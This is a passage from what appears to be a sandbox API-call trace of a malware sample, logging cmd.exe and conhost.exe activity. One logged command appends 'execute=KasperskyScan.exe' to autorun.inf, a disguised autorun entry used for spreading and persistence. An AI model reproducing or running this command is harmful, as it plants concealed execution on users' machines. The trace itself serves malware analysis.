__p__commode () returned 0x74ac5b1c [0147.181] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd15200) returned 0x0 [0147.181] __getmainargs (in: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0, _DoWildCard=0, _StartInfo=0xd260fc | out: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0) returned 0 [0147.181] GetCurrentThreadId () returned 0xc24 [0147.181] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc24) returned 0x84 [0147.182] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0147.182] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadUILanguage") returned 0x74f72510 [0147.182] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.188] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0147.188] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0147.188] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.188] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0147.188] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0147.188] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.188] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0147.188] GetConsoleOutputCP () returned 0x1b5 [0147.190] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0147.190] SetConsoleCtrlHandler (HandlerRoutine=0xd20e40, Add=1) returned 1 [0147.190] _get_osfhandle (_FileHandle=1) returned 0x3c [0147.191] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0147.192] _get_osfhandle (_FileHandle=1) returned 0x3c [0147.192] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0147.193] _get_osfhandle (_FileHandle=1) returned 0x3c [0147.193] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0147.194] _get_osfhandle (_FileHandle=0) returned 0x38 [0147.194] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0147.195] _get_osfhandle (_FileHandle=0) returned 0x38 [0147.195] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0147.197] GetEnvironmentStringsW () returned 0x677d38* [0147.197] GetProcessHeap () returned 0x670000 [0147.197] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xa1a) returned 0x678760 [0147.197] FreeEnvironmentStringsA (penv="A") returned 1 [0147.197] GetProcessHeap () returned 0x670000 [0147.197] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x4) returned 0x670550 [0147.197] GetEnvironmentStringsW () returned 0x677d38* [0147.197] GetProcessHeap () returned 0x670000 [0147.197] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xa1a) returned 0x679188 [0147.197] FreeEnvironmentStringsA (penv="A") returned 1 [0147.197] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0147.198] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0147.198] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.198] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0147.198] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.198] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.198] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.198] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0147.198] RegCloseKey (hKey=0x94) returned 0x0 [0147.198] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0147.198] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0147.198] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.198] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0147.198] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.198] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.198] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.198] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0147.199] RegCloseKey (hKey=0x94) returned 0x0 [0147.199] time (in: timer=0x0 | out: timer=0x0) returned 0x620b74ad [0147.199] srand (_Seed=0x620b74ad) [0147.199] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C echo ^execute=^KasperskyScan^.exe >>autorun.inf" [0147.199] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C echo ^execute=^KasperskyScan^.exe >>autorun.inf" [0147.199] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0147.199] GetProcessHeap () returned 0x670000 [0147.199] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x210) returned 0x679bb0 [0147.199] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x679bb8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0147.199] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0147.199] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0147.199] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.199] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0147.199] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0147.199] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0147.199] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0147.199] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0147.199] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0147.199] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0147.199] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0147.200] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0147.200] GetProcessHeap () returned 0x670000 [0147.200] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x678760) returned 1 [0147.200] GetEnvironmentStringsW () returned 0x677d38* [0147.200] GetProcessHeap () returned 0x670000 [0147.200] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xa32) returned 0x67a808 [0147.200] FreeEnvironmentStringsA (penv="A") returned 1 [0147.200] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0147.200] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd2f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.200] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0147.200] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0147.200] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0147.201] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0147.201] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0147.201] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0147.201] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0147.201] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0147.201] GetProcessHeap () returned 0x670000 [0147.201] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x44) returned 0x6705c8 [0147.201] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0147.201] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0147.201] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0147.201] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x670618 [0147.202] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0147.202] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x670618 [0147.202] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0147.202] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0147.202] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xd71272d6, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xd71272d6, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x670618 [0147.202] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0147.202] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0147.202] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0147.202] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0147.202] GetProcessHeap () returned 0x670000 [0147.203] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x67a808) returned 1 [0147.203] GetEnvironmentStringsW () returned 0x677d38* [0147.203] GetProcessHeap () returned 0x670000 [0147.203] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0xa76) returned 0x679dc8 [0147.203] FreeEnvironmentStringsA (penv="=") returned 1 [0147.203] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd37720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0147.203] GetProcessHeap () returned 0x670000 [0147.203] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6705c8) returned 1 [0147.203] GetProcessHeap () returned 0x670000 [0147.203] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x400e) returned 0x67bcc8 [0147.204] GetProcessHeap () returned 0x670000 [0147.204] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x6c) returned 0x67a848 [0147.204] GetProcessHeap () returned 0x670000 [0147.204] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x67bcc8) returned 1 [0147.204] GetConsoleOutputCP () returned 0x1b5 [0147.206] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0147.206] GetUserDefaultLCID () returned 0x409 [0147.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd334a0, cchData=8 | out: lpLCData=":") returned 2 [0147.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0147.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0147.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0147.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd334b0, cchData=8 | out: lpLCData="/") returned 2 [0147.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd33500, cchData=32 | out: lpLCData="Mon") returned 4 [0147.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd33540, cchData=32 | out: lpLCData="Tue") returned 4 [0147.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd33580, cchData=32 | out: lpLCData="Wed") returned 4 [0147.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd335c0, cchData=32 | out: lpLCData="Thu") returned 4 [0147.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd33600, cchData=32 | out: lpLCData="Fri") returned 4 [0147.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd33640, cchData=32 | out: lpLCData="Sat") returned 4 [0147.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd33680, cchData=32 | out: lpLCData="Sun") returned 4 [0147.207] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd334c0, cchData=8 | out: lpLCData=".") returned 2 [0147.207] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd334e0, cchData=8 | out: lpLCData=",") returned 2 [0147.207] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0147.208] GetProcessHeap () returned 0x670000 [0147.208] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x20c) returned 0x67a908 [0147.209] GetConsoleTitleW (in: lpConsoleTitle=0x67a908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0147.209] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0147.209] GetProcAddress (hModule=0x74f30000, lpProcName="CopyFileExW") returned 0x74f4ffc0 [0147.209] GetProcAddress (hModule=0x74f30000, lpProcName="IsDebuggerPresent") returned 0x74f4b0b0 [0147.209] GetProcAddress (hModule=0x74f30000, lpProcName="SetConsoleInputExeNameW") returned 0x76beb440 [0147.209] GetProcessHeap () returned 0x670000 [0147.209] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x400a) returned 0x67bcc8 [0147.209] GetProcessHeap () returned 0x670000 [0147.210] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x67bcc8) returned 1 [0147.210] _wcsicmp (_String1="echo", _String2=")") returned 60 [0147.210] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0147.210] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0147.210] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0147.210] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0147.210] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0147.211] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0147.211] GetProcessHeap () returned 0x670000 [0147.211] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x58) returned 0x67ab20 [0147.211] GetProcessHeap () returned 0x670000 [0147.211] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x12) returned 0x677680 [0147.211] GetProcessHeap () returned 0x670000 [0147.211] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x40) returned 0x67ab80 [0147.211] GetProcessHeap () returned 0x670000 [0147.211] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x20) returned 0x670578 [0147.212] GetProcessHeap () returned 0x670000 [0147.212] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x20) returned 0x67abc8 [0147.213] GetProcessHeap () returned 0x670000 [0147.213] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x18) returned 0x677720 [0147.213] _get_osfhandle (_FileHandle=1) returned 0x3c [0147.213] _get_osfhandle (_FileHandle=1) returned 0x3c [0147.213] _get_osfhandle (_FileHandle=1) returned 0x3c [0147.213] GetFileType (hFile=0x3c) returned 0x2 [0147.213] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0147.213] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19fc74 | out: lpMode=0x19fc74) returned 1 [0147.214] _dup (_FileHandle=1) returned 3 [0147.214] _close (_FileHandle=1) returned 0 [0147.214] _wcsicmp (_String1="autorun.inf", _String2="con") returned -2 [0147.214] CreateFileW (lpFileName="autorun.inf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\autorun.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x19fc54, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0147.214] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 1 [0147.214] _get_osfhandle (_FileHandle=1) returned 0x3c [0147.215] GetFileType (hFile=0x3c) returned 0x1 [0147.215] GetFileSize (in: hFile=0x3c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x25 [0147.215] SetFilePointer (in: hFile=0x3c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x19fc6c*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19fc6c*=0) returned 0x24 [0147.215] ReadFile (in: hFile=0x3c, lpBuffer=0x19fc70, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19fc60, lpOverlapped=0x0 | out: lpBuffer=0x19fc70*, lpNumberOfBytesRead=0x19fc60*=0x1, lpOverlapped=0x0) returned 1 [0147.215] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0147.215] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0147.215] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0147.216] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0147.216] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0147.216] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0147.216] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0147.216] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0147.216] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0147.216] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0147.216] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0147.216] GetProcessHeap () returned 0x670000 [0147.216] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x78) returned 0x67abf0 [0147.218] GetProcessHeap () returned 0x670000 [0147.218] RtlReAllocateHeap (Heap=0x670000, Flags=0x0, Ptr=0x67abf0, Size=0x3e) returned 0x67abf0 [0147.219] GetProcessHeap () returned 0x670000 [0147.219] RtlSizeHeap (HeapHandle=0x670000, Flags=0x0, MemoryPointer=0x67abf0) returned 0x3e [0147.219] GetProcessHeap () returned 0x670000 [0147.219] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x4a) returned 0x67ac38 [0147.219] _vsnwprintf (in: _Buffer=0xd37940, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x19fa2c | out: _Buffer="execute=KasperskyScan.exe \r\n") returned 28 [0147.220] _get_osfhandle (_FileHandle=1) returned 0x3c [0147.220] GetFileType (hFile=0x3c) returned 0x1 [0147.220] _get_osfhandle (_FileHandle=1) returned 0x3c [0147.220] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="execute=KasperskyScan.exe \r\n", cchWideChar=-1, lpMultiByteStr=0xd3b960, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="execute=KasperskyScan.exe \r\n", lpUsedDefaultChar=0x0) returned 29 [0147.220] WriteFile (in: hFile=0x3c, lpBuffer=0xd3b960*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x19fa1c, lpOverlapped=0x0 | out: lpBuffer=0xd3b960*, lpNumberOfBytesWritten=0x19fa1c*=0x1c, lpOverlapped=0x0) returned 1 [0147.220] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0147.223] _close (_FileHandle=3) returned 0 [0147.223] _get_osfhandle (_FileHandle=1) returned 0x3c [0147.224] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0147.224] _get_osfhandle (_FileHandle=1) returned 0x3c [0147.224] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0147.224] _get_osfhandle (_FileHandle=0) returned 0x38 [0147.224] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0147.224] SetConsoleInputExeNameW () returned 0x1 [0147.224] GetConsoleOutputCP () returned 0x1b5 [0147.225] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0147.225] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.225] exit (_Code=0) Thread: id = 26 os_tid = 0x814 Process: id = "7" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6f356000" os_pid = "0x10e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x10d4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 698 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 699 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 700 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 701 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 702 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 703 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 704 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 705 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id 